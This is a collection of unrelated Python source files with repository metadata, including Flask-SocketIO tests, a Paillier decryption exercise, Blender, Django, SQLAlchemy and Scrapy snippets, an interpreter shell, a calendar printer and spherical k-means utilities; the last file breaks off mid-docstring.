    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
        {'name': 'message_update', 'args': [
            {'puzzle_id': 1, 'message': 'This is a message', 'email': 'exampleemail.com'}
        ], 'namespace': '/'}
    ]
def test_socketio_handle_message_missing_puzzle_id(flask_client, verification_token,
                                                   mock_find_by_g_id,
                                                   mock_single_puzzles_for_player):
    """
    Test that a chat message without a puzzle_id is not re-broadcast; only the
    earlier player_joined event is received.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('message', {'message': 'This is a message', 'email': 'exampleemail.com'})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
    ]
def test_socketio_handle_add_lock(flask_client, verification_token, mock_find_by_g_id,
                                  mock_single_puzzles_for_player):
    """
    Test re-emitting an add_lock event in a room that the current websocket is
    in; the room receives lock_update_add with the same coordinates.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('add_lock', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
        {'name': 'lock_update_add', 'args': [
            {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5}
        ], 'namespace': '/'}
    ]
def test_socketio_handle_lock_missing_puzzle_id(flask_client, verification_token, mock_find_by_g_id,
                                                mock_single_puzzles_for_player):
    """
    Test that an add_lock event without a puzzle_id is not re-emitted; only
    the earlier player_joined event is received.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('add_lock', {'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
    ]
def test_socketio_handle_remove_lock(flask_client, verification_token, mock_find_by_g_id,
                                     mock_single_puzzles_for_player):
    """
    Test re-emitting a remove_lock event in a room that the current websocket
    is in; the room receives lock_update_remove with the same coordinates.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('remove_lock', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'},
        {'name': 'lock_update_remove', 'args': [
            {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5}
        ], 'namespace': '/'}
    ]
def test_socketio_handle_remove_lock_missing_puzzle_id(flask_client, verification_token,
                                                       mock_find_by_g_id,
                                                       mock_single_puzzles_for_player):
    """
    Test that a remove_lock event without a puzzle_id is not re-emitted; only
    the earlier player_joined event is received.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('remove_lock', {'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
    ]
def test_socketio_handle_leave(flask_client, verification_token, mock_find_by_g_id,
                               mock_single_puzzles_for_player):
    """
    Test handling a leave event for a room the current websocket is in; the
    leaver receives no further events beyond the original player_joined.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('leave', {'puzzle_id': 1, 'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
    ]
def test_socketio_handle_leave_missing_puzzle_id(flask_client, verification_token,
                                                 mock_find_by_g_id, mock_single_puzzles_for_player):
    """
    Test a leave event without a puzzle_id; no additional events are emitted
    beyond the original player_joined.
    """
    client = socketio.test_client(app, flask_test_client=flask_client, query_string="?auth=X")
    client.emit('join', {'token': 'X', 'puzzle_id': 1})
    client.emit('leave', {'x_coordinate': 1, 'y_coordinate': 5})
    recvd = client.get_received()
    assert recvd == [
        {'name': 'player_joined', 'args': [{'msg': 'Player joined room 1'}], 'namespace': '/'}
    ]
| [
"noreply@github.com"
] | mmfrenkel.noreply@github.com |
9ca1517fe735fd7212f2b5e8eb0ea730c6e464b8 | 6c0886e0b732ebbc5ea31b545b309639aacbcd97 | /HA3/C1.py | e1e97c9c07fe1a60088ce3c77d843a31f481dc53 | [] | no_license | VictorWinberg/fjuo52 | 05614dfa174e3d233878e2c66932a9308505fc25 | fa37579ed49af6f5a80b0c88123c82fb48f2c2bc | refs/heads/master | 2021-05-07T21:11:07.951396 | 2018-03-01T08:34:46 | 2018-03-01T08:34:46 | 108,995,869 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,243 | py | from functools import reduce
from sys import argv
def mul_sum(array, n):
    """Fold *array* into one product, reducing modulo *n* after each multiply."""
    def step(acc, value):
        # Reduce at every step so intermediates never grow past n.
        return acc * value % n
    return reduce(step, array)
def get_n(p, q):
    """Return the modulus n = p * q."""
    modulus = p * q
    return modulus
def totient(p, q):
    """Return (p - 1) * (q - 1) — Euler's totient of p*q when p, q are distinct primes."""
    phi = (q - 1) * (p - 1)
    return phi
# (a * a_inv) == 1 (mod n)  =>  a_inv = modinv(a) (mod n)
def modinv(a, n):
    """Return the inverse of a modulo n, or None when gcd(a, n) != 1."""
    gcd, coeff_a, _coeff_n = euc_algorithm(a, n)
    if gcd != 1:
        return None
    return coeff_a % n
def euc_algorithm(a, n):
    """Extended Euclid: return (g, x, y) with a*x + n*y == g == gcd(a, n)."""
    old_x, x = 1, 0
    old_y, y = 0, 1
    while n != 0:
        quotient = a // n
        # a % n == a - quotient * n for Python's floor division.
        a, n = n, a - quotient * n
        old_x, x = x, old_x - quotient * x
        old_y, y = y, old_y - quotient * y
    return a, old_x, old_y
def L(x, n):
    """The L-function used in Paillier-style decryption: (x - 1) // n.

    Fixed to use integer floor division. The original float division loses
    precision once x exceeds 2**53 — and the callers pass modular powers
    (pow(..., ..., n**2)), which easily do — and it also made every
    downstream result a float.
    """
    return (x - 1) // n
def micro(g, _lambda, n):
    """Return the mu parameter: modular inverse of L(g**lambda mod n**2), mod n."""
    n_squared = n ** 2
    l_of_g = L(pow(g, _lambda, n_squared), n)
    return modinv(l_of_g, n)
def decrypt(c, _lambda, _micro, n):
    """Decrypt ciphertext c: L(c**lambda mod n**2) * mu, reduced mod n."""
    n_squared = n ** 2
    l_of_c = L(pow(c, _lambda, n_squared), n)
    return l_of_c * _micro % n
if __name__ == "__main__":
    # Read the key parameters p, q, g from stdin as "name=value" lines.
    p, q, g = [int(input().split('=')[1]) for i in range(3)]
    # Compute n and totient
    n = get_n(p, q)
    _lambda = totient(p, q)
    # Modular multiplication inverse
    _micro = micro(g, _lambda, n)
    if len(argv) < 2: raise Exception("Please specify an input file")
    filepath = argv[1]
    # One ciphertext per line of the input file.
    c_input = list(map(int, open(filepath).read().splitlines()))
    # Multiply all ciphertexts mod n^2 — in a Paillier-style scheme this
    # homomorphically sums the underlying plaintexts.
    c = mul_sum(c_input, n ** 2)
    v = int(decrypt(c, _lambda, _micro, n))
    print(v, v - n)
    # NOTE(review): presumably maps the decrypted sum into a signed range
    # when it exceeds the number of inputs — confirm against the spec.
    if v > len(c_input):
        v -= n
    print(v, 'mod', n)
| [
"dat14vwi@student.lu.se"
] | dat14vwi@student.lu.se |
0b2ec5a68840470333a9e9bad40c105a3a40b7a5 | 8254a350a45a2b9e9469101f247b5a1bab41a0d3 | /hairgen.py | 44923358eceea48c16f91ac1e64f79676d2abe28 | [] | no_license | zhexxian/Hairy-3D-Printing | 5d78e09ceaea5868ceb5dfad2f3071e96d6aaae2 | 22f471a314604876e75e518359eb5ab22f6142ab | refs/heads/master | 2021-01-01T15:23:29.635620 | 2017-07-27T15:45:38 | 2017-07-27T15:45:38 | 97,610,361 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | import bpy
object = bpy.context.object  # NOTE(review): shadows the builtin `object`
# Half of the larger X/Y bounding-box extent, used as the hair length.
object_radius = 0.5 * max(object.bound_box.data.dimensions.x, object.bound_box.data.dimensions.y)
# Add a HAIR particle system with 3000 strands of that length.
bpy.ops.object.particle_system_add()
bpy.data.particles["ParticleSettings"].type = 'HAIR'
bpy.data.particles["ParticleSettings"].count = 3000
bpy.data.particles["ParticleSettings"].hair_length = object_radius
# Convert the particles into real geometry: mesh -> curve with a full round
# bevel (radius 0.05) -> final mesh of solid strands.
bpy.ops.object.modifier_convert(modifier="ParticleSystem 1")
bpy.ops.object.convert(target='CURVE')
bpy.context.object.data.fill_mode = 'FULL'
bpy.context.object.data.bevel_depth = 0.05
bpy.ops.object.convert(target='MESH')
| [
"shunyutan@hotmail.com"
] | shunyutan@hotmail.com |
079a78638966c854c7a692303e50cb2a90e5ee38 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02847/s323542817.py | e4b56ed542d286d18994ff8e3ae443092f5f3288 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | from sys import stdin, setrecursionlimit
# Day-of-week abbreviation -> index, with Sunday as 0.
WEEK = {
    'SUN': 0,
    'MON': 1,
    'TUE': 2,
    'WED': 3,
    'THU': 4,
    'FRI': 5,
    'SAT': 6
}
def main():
    # Fast binary stdin reader; deliberately shadows the builtin input().
    input = stdin.buffer.readline
    # Drop the trailing newline byte, then decode the bytes to str.
    s = input()[:-1].decode()
    # 7 - index: days remaining until the next Sunday (7 when s is 'SUN').
    print(7 - WEEK[s])
if __name__ == "__main__":
    # Contest boilerplate; main() itself is not recursive.
    setrecursionlimit(10000)
    main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
ce296890810f5eea7f7228c73a9c33edeabfaad3 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_465.py | e154871c10ca2a59b29c8328d23975e31a1fcf9d | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | # how to avoid hard-coding urls in webapp templates
url
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
b1f57009af00762a242e004c6e7fdbf9f617c947 | a9dccb9ebbfd482729663d4cae6f074d8bd44c2d | /TP5/EJ2.py | 30f8929b44561c83a89efc434b78e1a9d20cad12 | [] | no_license | FMachiavello/tp-python | 90ce840a3d9e7edf1033480146b5781da1b86f0c | e1ba1fe52242df50d42cf17d136d1b137bea469d | refs/heads/master | 2022-12-09T00:10:09.476003 | 2019-06-07T03:10:43 | 2019-06-07T03:10:43 | 294,257,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | def contDeLetras(cadena):
"""Determina si en la cadena ingresada hay mas letras 'A' o letras 'B'"""
if type(cadena) not in [str]:
raise TypeError("Ingrese una cadena valida")
cadena = cadena.casefold()
l1 = cadena.count("a")
l2 = cadena.count("á")
l3 = cadena.count("e")
l4 = cadena.count("é")
letraA = l1 + l2
letraB = l3 + l4
if cadena == "":
print("No se ha ingresado ninguna cadena")
return("")
elif letraA == 0 and letraB == 0:
print("No se ha ingresado ninguna letra 'A' ni 'E'")
return("Nada")
elif letraA == letraB:
print("La cadena tiene la misma cantidad de letras 'A' y 'E'")
return("Igual")
elif letraA > letraB:
print("La cadena tiene más letras 'A' que 'E'")
return("A")
else:
print("La cadena tiene más letras 'E' que 'A'")
return("E")
| [
"valiktroi16@gmail.com"
] | valiktroi16@gmail.com |
e8390081053f84852515f18c5edfb636621d94b6 | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /dp/dp_d/12309481.py | 505ec598e3b892ba10e55f5a4b003c8f412ac4cc | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | def main():
    N, W = map(int, input().split())
    wv = [tuple(map(int, input().split())) for i in range(N)]
    # dp[j] = best total value among item subsets of total weight exactly j;
    # -1 marks an unreachable weight.
    dp = [-1]*(W+1)
    dp[0] = 0
    for w, v in wv:
        # Iterate weights downward so each item is used at most once (0/1 knapsack).
        for j in range(W-1, -1, -1):
            if dp[j] >= 0 and j+w <= W:
                dp[j+w] = max(dp[j+w], dp[j] + v)
    print(max(dp))
main()
| [
"kouhei.k.0116@gmail.com"
] | kouhei.k.0116@gmail.com |
469e35add0a86c5c3185a155ac831b9ec771d346 | 3d1ac9d26cad86054154b2eddff870edf31aa70f | /credits/admin.py | ae667a26f659fe19d99a7c71d0848cb82f31b649 | [] | no_license | ASquirrelsTail/issue-tracker | a26f1035d73f41be7a62d048b21737b3d449adaf | 089126403f135631b72f5a66adb1a219ff7a9fc7 | refs/heads/master | 2022-12-18T19:55:37.420616 | 2019-11-17T19:45:26 | 2019-11-17T19:45:26 | 202,887,245 | 0 | 1 | null | 2022-12-08T06:08:24 | 2019-08-17T13:55:24 | JavaScript | UTF-8 | Python | false | false | 565 | py | from django.contrib import admin
from credits.models import Wallet, Credit, Debit
# Register your models here.
class DebitAdmin(admin.TabularInline):
    """Inline table of a wallet's debits; listed fields are read-only."""
    model = Debit
    readonly_fields = ('wallet', 'created', 'amount',)
class CreditAdmin(admin.TabularInline):
    """Inline table of a wallet's credits, including Stripe details; listed fields are read-only."""
    model = Credit
    readonly_fields = ('wallet', 'created', 'amount', 'real_value', 'stripe_transaction_id',)
class WalletAdmin(admin.ModelAdmin):
    """Admin page for Wallet showing its debits and credits inline."""
    model = Wallet
    readonly_fields = ('user', 'balance',)
    inlines = (DebitAdmin, CreditAdmin)
admin.site.register(Wallet, WalletAdmin)
| [
"rjtwilton@hotmail.com"
] | rjtwilton@hotmail.com |
88d557e6724162366d68b42f9f4abee826fff315 | 6f62d7de4294271fd2648d363f7719b9d8a45b5e | /models.py | 6af57efba03243817d026c96c5d2ae3f954be3f8 | [] | no_license | JosephHaowen/projectInterview | 3424bb3817564031a35f3c7d80b47d01ed8be863 | 13513c697cd269a54ff918fcb6a0fffb5085e7e1 | refs/heads/master | 2020-12-24T21:01:42.624111 | 2016-05-06T02:02:05 | 2016-05-06T02:02:05 | 56,777,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,785 | py | from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.ext.declarative import declarative_base
from database import engine, Base
def loadSession():
    """Create and return a new SQLAlchemy session bound to the shared engine.

    Fix: removed the dead local `metadata = Base.metadata`, which was never
    used and had no side effect.
    """
    Session = sessionmaker(bind=engine)
    session = Session()
    return session
class Degrees(Base):
    """ORM mapping for cb_degrees; columns are reflected from the database (autoload)."""
    __tablename__ = 'cb_degrees'
    __table_args__ = {'autoload': True}
class FundingRounds(Base):
    """ORM mapping for cb_funding_rounds (reflected)."""
    __tablename__ = 'cb_funding_rounds'
    __table_args__ = {'autoload': True}
class People(Base):
    """ORM mapping for cb_people (reflected)."""
    __tablename__ = 'cb_people'
    __table_args__ = {'autoload': True}
class Objects(Base):
    """ORM mapping for cb_objects (reflected)."""
    __tablename__ = 'cb_objects'
    __table_args__ = {'autoload': True}
class Investments(Base):
    """ORM mapping for cb_investments (reflected)."""
    __tablename__ = 'cb_investments'
    __table_args__ = {'autoload': True}
#class Growth(FundingRounds):
#class InvestedCompany(Base):
#__tablename__ = 'employee'
#id = Column(Integer, primary_key=True)
#name = Column(String)
#investor_id = column(String, ForeignKey('cb_investments.investor_id'))
# Use default=func.now() to set the default hiring time
# of an Employee to be the current time when an
# Employee record was created
# Use cascade='delete,all' to propagate the deletion of a Department onto its Employees
#investor = relation(
# Investments,
# backref=backref('',
# uselist=True,
# cascade='delete,all'))
# Reflect the live schema so raw Table objects are available alongside the
# ORM classes above.
meta = MetaData()
meta.reflect(bind = engine)
objects_table = meta.tables['cb_objects']
investment_table = meta.tables['cb_investments']
people_table = meta.tables['cb_people']
degrees_table = meta.tables['cb_degrees']
def queryRoundCollege(fundingRound):
    """Return distinct Degrees rows for people affiliated with companies that
    raised a round of the given funding_round_type (e.g. "series-b")."""
    session = loadSession()
    # Degrees -> People (same person) -> Objects (affiliated company, by name)
    # -> FundingRounds (rounds that company raised), filtered by round type.
    res = session.query(Degrees).join(People, Degrees.object_id == People.object_id). \
        join(Objects, Objects.name == People.affiliation_name). \
        join(FundingRounds, FundingRounds.object_id == Objects.id). \
        filter(FundingRounds.funding_round_type == fundingRound).distinct()
    return res
def queryInvestorCompany(college):
    """Return Objects (companies) that both employ people with a degree from
    *college* and were funded by investors holding a degree from *college*."""
    session = loadSession()
    # res1: companies whose name matches the affiliation of *college* alumni
    res1 = session.query(Objects).join(People, People.affiliation_name == Objects.name).\
        join(Degrees, Degrees.object_id == People.object_id).\
        filter(Degrees.institution == college).subquery()
    # res2: investments made by investors who hold a degree from *college*
    res2 = session.query(Investments).join(Degrees, Degrees.object_id == Investments.investor_object_id).\
        filter(Degrees.institution == college).subquery()
    # Intersect: companies in res1 that received one of the res2 investments.
    res3 = session.query(Objects).join(res1, res1.c.id == Objects.id).join(res2, res2.c.funded_object_id == res1.c.id)
    return res3
#return session.query(InvestedCompany).from_statement(res5)
if __name__ == '__main__':
    # Smoke test: query series-b rounds and show one id.
    res = queryRoundCollege("series-b")
    #session = loadSession()
    # Python 2 print statement — this module targets Python 2.
    print res[0].id
"ht398@cornell.edu"
] | ht398@cornell.edu |
450a62527548570c20fc470b499265a82fc790e0 | 987e54f6da76b24fca9cb478affeb03fe10e2dae | /download_images/pipelines.py | 4b0b15e6a9398493adbec883539c00fa70731f86 | [] | no_license | amansinghal123/web-scraping-project | c4cc8a2196b724c032a7c87e82f5ab0e0aaae3b1 | c1120eec8529b7745bff7bf234c00fe00f909d30 | refs/heads/master | 2022-04-26T08:40:38.183191 | 2020-05-04T14:35:33 | 2020-05-04T14:35:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
class DownloadImagesPipeline:
    """Scrapy item pipeline stub; currently passes items through unchanged."""
    def process_item(self, item, spider):
        # No processing yet — return the item so later pipelines receive it.
        return item
| [
"noreply@github.com"
] | amansinghal123.noreply@github.com |
875f21f2992805a22b91db7f9b8a250e83dcac74 | 882448f56a2152dcd5363ee3891a2ae49830067e | /Shell.py | e5908b8c5cf50e3abb5691ff3c8746f74495ddee | [] | no_license | cclauss/Swamipp | dc648832b16997c4fc93721bd1031db75ca54c1c | 81838bcb121c7f3152f49f6540633c3a37d85c36 | refs/heads/master | 2023-07-03T05:01:42.602170 | 2020-09-05T15:27:48 | 2020-09-05T15:27:48 | 293,207,105 | 0 | 0 | null | 2020-09-06T05:03:13 | 2020-09-06T05:03:12 | null | UTF-8 | Python | false | false | 3,037 | py | import Swamipp as Swami
import os,datetime
import _thread, sys
import argparse
# Command-line mode: an optional positional file argument runs that file
# directly instead of starting the interactive shell.
parser = argparse.ArgumentParser(description="Swami++")
parser.add_argument("file",nargs="?",type=str,help="file to be executed",default="")
args=parser.parse_args()
if args.file:
    try:
        code=open(args.file,"r").read()
        # Time the interpreter run.
        y=datetime.datetime.now()
        result,error=Swami.run(args.file,code)
        x=datetime.datetime.now()
        if error:
            print(error.toString(),sep="\n")
        else:
            print(f"\nExecuted with zero errors in {(x-y).total_seconds()} seconds")
    except KeyboardInterrupt:
        sys.exit()
    except Exception as e:
        print("Could not find file, or fatal error...",e)
        sys.exit()
def begin(s, r):
    """Return True when string *s* starts with prefix *r*.

    Equivalent to the original slice comparison ``s[:len(r)] == r`` but uses
    the idiomatic str.startswith.
    """
    return s.startswith(r)
print("Swami++ 2.1.2, type credits for more info")
directory="C:/Swamipp/Programs/"
def notepad(f):
os.system("notepad.exe "+directory+f)
return
# Interactive shell: read commands until the user types "exit".
while 1:
    command=input(">>> ")
    if command=="exit":
        break
    elif command=="credits":
        print("Developed By ClackHack, inspired by CodePulse")
    elif begin(command,"file "):
        # "file <name>": create the file if it cannot be read, then open it
        # in Notepad on a worker thread so the shell stays responsive.
        f=command.replace("file ","")
        try:
            open(directory+f,"r").read()
        except:
            # NOTE(review): bare except — any read failure (not only a
            # missing file) creates/truncates the file to empty.
            open(directory+f,"w").write("")
        _thread.start_new_thread(notepad,(f,))
        #os.system("notepad.exe Programs/"+f)
    elif begin(command,"run "):
        # "run <name>": execute a stored program and report timing.
        f = command.replace("run ","")
        try:
            code=open(directory+f,"r").read()
            y=datetime.datetime.now()
            result,error=Swami.run(f,code)
            x=datetime.datetime.now()
            if error:
                print(error.toString(),sep="\n")
            else:
                print(f"\nExecuted with zero errors in {(x-y).total_seconds()} seconds")
        except KeyboardInterrupt:
            continue
        except Exception as e:
            print("Could not find file, or fatal error...",e)
    elif command=="repl":
        # Nested read-eval-print loop over single Swami++ lines.
        while 1:
            text=input("Swami++ > ")
            if text.strip()=="":
                continue
            if text=="exit":
                break
            try:
                result,error=Swami.run("<Shell>",text)
            except KeyboardInterrupt:
                continue
            if error:
                print(error.toString())
            elif result:
                # A single result prints unwrapped; several print one per line.
                if len(result.elements)==1:
                    print(repr(result.elements[0]))
                else:
                    for i in result.elements:
                        print(repr(i))
    elif command=="programs":
        # List stored programs.
        f=os.listdir(directory.strip("/"))
        for p in f:
            print(p)
    elif begin(command,"delete"):
        f = command.replace("delete ","").strip()
        try:
            os.remove(directory+f)
        except:
            # NOTE(review): bare except also hides permission errors etc.
            print("The file you specified was not found...")
    elif command=="help":
        print("Commands are file, run, programs, delete, repl, and exit\nCheck the github page for syntax support")
    else:
        # NOTE: the "Unkown" typo is in a user-facing string; left untouched.
        print("Unkown command...\ntype help for help... ")
| [
"48455071+ClackHack@users.noreply.github.com"
] | 48455071+ClackHack@users.noreply.github.com |
a9a03fa3c380ea00731a5dce56c784abd1cc7440 | 20b1277d0254b89bfe415416a7b00b3fc78f4e6c | /calendar.py | a5e40f5067ce308d2fa0b6741f58173eb2abdf8b | [] | no_license | parasjitaliya/DataStructurePrograms | f9f20e21234e514f8bb83de6f58a557a56533366 | d09041a4ab00da9138ac1ca92db187615bc956c4 | refs/heads/master | 2021-01-07T02:46:03.410541 | 2020-02-24T07:42:58 | 2020-02-24T07:42:58 | 241,556,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,710 | py | class Calendar:
def calender(self, month, day, year):
# assigning the year and month values to variable
y0 = year - (14 - month) // 12
x = y0 + y0 // 4 - y0 // 100 + y0 // 400
m0 = month + 12 * ((14 - month) // 12) - 2
d0 = int((day + x + (31 * m0 // 12))) % 7
# days = {0: "Sunday", 1: "Monday", 2: "Tuesday", 3: "Wednesday", 4: "Thursday", 5: "Friday", 6: "Saturday"}
# return the value
return d0
# assign the day for month
def days(self, month,year):
if month in (1, 3, 5, 7, 8, 10, 12):
return 31
elif month in (4, 6, 9, 11):
return 30
elif month == 2:
# function calling for leap year
if Calendar.leap_year(self, year):
return 29
else:
return 28
# check the year is leap year or not
def leap_year(self,year):
return (((year % 4 == 0) and (year % 100 != 0)) or (year % 400 == 0))
# create the function for print calander
def print_calander(self, month, day, year):
# function call for day
remainder = Calendar.calender(self, month, day, year)
for date in range(0, remainder):
print(end=" ")
# function calll for the day
lastdate = Calendar.days(self, month, year)
for date in range(1, lastdate+1):
# check the condition for day less than 10
if date < 10:
print(f" {date}", end=" ")
else:
print(date, end=" ")
# calculate for space
space = (date + remainder) % 7
if space is 0 or date is lastdate:
print("") | [
"parasjitaliya@gmail.com"
] | parasjitaliya@gmail.com |
c1136a5987a63ebf2de45eff64448bbd8fb0ce61 | fe2b1fff2e6a2eabdcb722fc9b4f0ff85413e228 | /Capstone2_MelanieM/website-final/virt/bin/f2py3 | 42d5199a7742cf2fccf514e4547ce7e23d9753be | [] | no_license | mmalinas/Springboard_Git | 2c2c4ec7389bf4ecc495a9a84e12ce0fe76a492d | 2dc7563b33867ebeb7bcc45d550001471b73b618 | refs/heads/master | 2022-12-10T06:20:41.520715 | 2019-11-13T00:21:50 | 2019-11-13T00:21:50 | 197,436,074 | 0 | 1 | null | 2022-12-08T07:31:38 | 2019-07-17T17:43:16 | Python | UTF-8 | Python | false | false | 303 | #!/Users/melaniemalinas/Documents/Springboard/Springboard_Git/Capstone2_MelanieM/website2/virt/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from numpy.f2py.f2py2e import main
if __name__ == '__main__':
    # Console-script shim: strip any setuptools launcher suffix from
    # argv[0], then hand control to numpy's real f2py entry point and
    # exit with whatever status it returns.
    cleaned_name = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.argv[0] = cleaned_name
    sys.exit(main())
| [
"melaniemalinas@melanie-malinass-macbook.local"
] | melaniemalinas@melanie-malinass-macbook.local | |
4a659b8042ba74a94c18b7b2402f9afc3af4bd3b | eb1c205ccbfe05b1ed6f21e97320ad3d16b1e6ac | /skmeans_utils.py | 586750fc4cdcb14f00edd273dc8b60ed0f08a65d | [] | no_license | thevishalagarwal/IncrementalSKMeans | e946778fa6c3a63c3ce17cbdafbee6d3ffa4bd3a | bd153d2bf5c221905edd9dbacc9e2fce100aff89 | refs/heads/master | 2021-05-07T05:55:35.609400 | 2017-11-29T08:12:08 | 2017-11-29T08:12:08 | 111,684,033 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,747 | py | import cPickle
import gzip
import numpy as np
from matplotlib import pyplot as plt
def normalize(x):
	# Rescale every column of x to unit Euclidean length.
	column_norms = np.linalg.norm(x, axis=0)
	return x / column_norms
def showImage(img):
	# Display a flattened 28x28 grayscale image (an MNIST digit) on screen.
	pixels = img.reshape((28, 28))
	plt.imshow(pixels, cmap='gray')
	plt.show()
def angleBetweenVectors(x1, x2):
	# Angle in degrees between (unit) vectors, via the arccos of their
	# dot product; broadcasts when x2 holds several column vectors.
	cosine = np.dot(x1.T, x2)
	radians = np.arccos(cosine)
	return radians * 180 / np.pi
def weightedSum(x1, x2, w1, w2):
	# Convex combination of x1 and x2 with (unnormalized) weights w1, w2.
	total_weight = w1 + w2
	return (w1 * x1 + w2 * x2) / total_weight
def getMembership(x, sigma):
	# Gaussian membership weight exp(-(x/sigma)^2 / 2); 1.0 at x == 0.
	z = x * 1.0 / sigma
	return np.exp(-0.5 * z ** 2)
def appendVector(x1, x2):
	# Append x2 as extra column(s) on the right of x1.
	return np.column_stack((x1, x2))
def combineClusters(cluster, i, j):
	# Merge cluster column j into column i: each statistic becomes the
	# pi-weighted average of the pair, the weights are summed, column j is
	# removed, and the mean directions are re-normalized.
	weight_i = cluster['pi_weight'][:, i]
	weight_j = cluster['pi_weight'][:, j]
	for field in ('mu', 'mu_theta', 'sigma_theta'):
		cluster[field][:, i] = weightedSum(cluster[field][:, i], cluster[field][:, j], weight_i, weight_j)
	cluster['pi_weight'][:, i] += weight_j
	for field in ('mu', 'mu_theta', 'sigma_theta', 'pi_weight'):
		cluster[field] = np.delete(cluster[field], j, axis=1)
	cluster['mu'] = normalize(cluster['mu'])
	return cluster
def loadData():
	"""Load the MNIST training images from ``mnist.pkl.gz`` (Python 2 pickle).

	Returns the training images with one image per column -- presumably
	shape (784, 50000), per the original inline note -- shuffled in place
	and rescaled to unit column norm.
	"""
	# FIX: use a context manager so the gzip handle is always closed
	# (the original opened the file and never closed it).
	with gzip.open('mnist.pkl.gz', 'rb') as f:
		x, _, _ = cPickle.load(f)  # (train, valid, test); only train is used
	X = x[0]
	X = X.T # X.shape = (784, 50000)
	np.random.shuffle(X.T)  # shuffles the columns of X (rows of X.T) in place
	X = normalize(X)
	return X
def newCluster(cluster, X, theta):
	# Open a fresh cluster seeded at X: its angular statistics come from
	# theta (angles between X and the existing cluster means) and it
	# starts with unit weight.
	additions = (
		('mu', X),
		('mu_theta', np.mean(theta)),
		('sigma_theta', abs(np.std(theta))),
		('pi_weight', np.array([[1.0]])),
	)
	for field, column in additions:
		cluster[field] = appendVector(cluster[field], column)
	cluster['mu'] = normalize(cluster['mu'])
	return cluster
def addToCluster(cluster, X, num_cluster, k, beta, gamma):
	"""Online update: fold sample X into its "host" clusters, or spawn a new one.

	cluster is a dict of per-cluster columns:
	    'mu'          -- unit mean direction vectors
	    'mu_theta'    -- running mean of the angle between members and mu
	    'sigma_theta' -- running std of that angle
	    'pi_weight'   -- per-cluster weight
	X is a unit-norm sample (one column; presumably shape (d, 1) -- TODO
	confirm against callers).  k widens the host test, beta is the angular
	learning rate, gamma is the weight reward/penalty rate.
